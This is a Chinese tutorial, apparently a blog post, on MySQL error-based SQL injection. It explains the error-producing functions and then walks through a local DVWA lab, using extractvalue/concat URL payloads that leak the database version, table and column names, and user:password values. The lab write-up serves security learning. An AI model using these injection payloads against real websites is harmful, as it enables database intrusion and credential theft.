SQL报错注入

SQL报错注入: 使用SQL语句报错的语法,用于注入结果无回回显但错误信息有输出的情况。
MySQL报错注入主要分为一下几类:

1.BigInt等数据类型溢出;
2.Xpath语法错误;
3.count()+rand()+group_by()导致重复;
4.空间数据类型函数错误。

很多函数会导致MySQL报错并显示出数据:

1.floor函数:返回小于等该值的最大整数。floor(rand(0)*2)报错是有条件的,记录必须3条以上
2.extractvalue函数(最多32字符):使用xpath的语法从xml字符串中获取数据,使用concat函数将想要获得的数据库内容拼接到第二个参数中,报错时作为内容输出。
3.updatexml函数:返回被替换的xml片段,updatexml中存在特殊字符、字母时,会出现报错,报错信息为特殊字符、字母及之后的内容,而hex出的数据包含字母和数字,所以第一个字母前面的内容都会丢失,常与concat组合使用。
4.exp函数。

select count(),(floor(rand(0)2)) as x tables group by x;为什么会报错?
rand()在执行的时候,都会重新计算,会产生不同的数据,在语句的后面使用group by,整个表的数据是按照rand()生成的数据为主键,而插入到临时表中,如果碰到生成(floor(rand(0)*2)) as x的数据和表中的数据重复,就会造成主键重复的报错。

dvwa环境搭建

docker search web-dvwa
docker pull vulnerables/web-dvwa
docker run -d -p 12346:80 vulnerables/web-dvwa

在启动环境之后,输入用户名(admin)和密码(password),登录到系统,进入启动界面,在页面有一个create/reset database 按钮,点击之后,就可以重新登录到页面:


image.png

重新登录系统之后,选择SQL Injection(Bind),进入盲注页面,
image.png

在页面中,直接点击提交按钮,页面返回在数据库中没有找到相应的userid,可以尝试有盲注的可能性,
image.png

通过常用盲注的方式,可以进行简单测试,是否可以进行盲注。使用上面提到的方式进行盲注的测试:

http://localhost:12346/vulnerabilities/sqli/?id=1' and extractvalue(1,(select @@version)) -- &Submit=Submit#
image.png

通过extractvalue函数获取到数据库的版本,使用concat将用户和数据库信息拼接到一起,在使用extractvalue 获取到数据,

http://localhost:12346/vulnerabilities/sqli/?id=1' and extractvalue(1, concat(0x7e, 
(select user()),0x7e,(select database()))) --  &Submit=Submit#
image.png

可以获取到用户和数据库,从数据库中获取到数据表,以及获取到相应的数据:

http://localhost:12346/vulnerabilities/sqli/?id=1' and extractvalue(1, concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))) --  &Submit=Submit#
image.png
http://localhost:12346/vulnerabilities/sqli/?id=1' and extractvalue(1, concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'))) --  &Submit=Submit#
image.png

从图中可以看到输出的数据不完整,可以借助limit来获取每一个属性的名称:

http://localhost:12346/vulnerabilities/sqli/?id=1' and extractvalue(1, concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 0,1))) --  &Submit=Submit#
image.png

可以得到users表的字段为:[user_id,first_name,last_name,user,password,avatar,last_login,failed_login]
通过上面的字段可以猜测出来,用户的信息,应该存放在user和password两个字段中,

http://localhost:12346/vulnerabilities/sqli/?id=1' and extractvalue(1, concat(0x7e, (select 
concat_ws(':',user,password) from dvwa.users limit 0,1))) --  &Submit=Submit#
image.png

这样获取到的数据有可能会超过字符串长度,需要使用mid函数,

http://localhost:12346/vulnerabilities/sqli/?id=1' and extractvalue(1, mid(concat(0x7e, (select password from dvwa.users limit 0,1)),1,29)) --  &Submit=Submit#
image.png

可以看到获取password的数据,有可能会超过长度限制进行截取,可以多次获取,然后将字段进行拼接,


image.png
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 199,711评论 5 468
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 83,932评论 2 376
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 146,770评论 0 330
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 53,799评论 1 271
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 62,697评论 5 359
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 48,069评论 1 276
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 37,535评论 3 390
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 36,200评论 0 254
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 40,353评论 1 294
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 35,290评论 2 317
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 37,331评论 1 329
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 33,020评论 3 315
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 38,610评论 3 303
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 29,694评论 0 19
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 30,927评论 1 255
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 42,330评论 2 346
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 41,904评论 2 341

推荐阅读更多精彩内容

  • 在学习之前,需要先了解 UpdateXml() 。 UPDATEXML (XML_document, XPath_...
    陈望_ning阅读 869评论 0 1
  • Sql注入定义: 就是通过把sql命令插入到web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行...
    付出从未后悔阅读 683评论 0 3
  • SQL注入漏洞 0x01 什么是SQL注入sql注入就是一种通过操作输入来修改后台操作语句达到执行恶意sql语句来...
    Alpenliebe1阅读 462评论 0 1
  • 0x01 什么是SQL注入 sql注入就是一种通过操作输入来修改后台操作语句达到执行恶意sql语句来进行攻击的技术...
    土拨鼠先生_阅读 279评论 0 0
  • 最近两周刷了一下sqli-labs,对sql注入有了一个基本的认识。这里写个总结。 1.sql注入原理简单介绍在一...
    jun123123阅读 1,328评论 1 3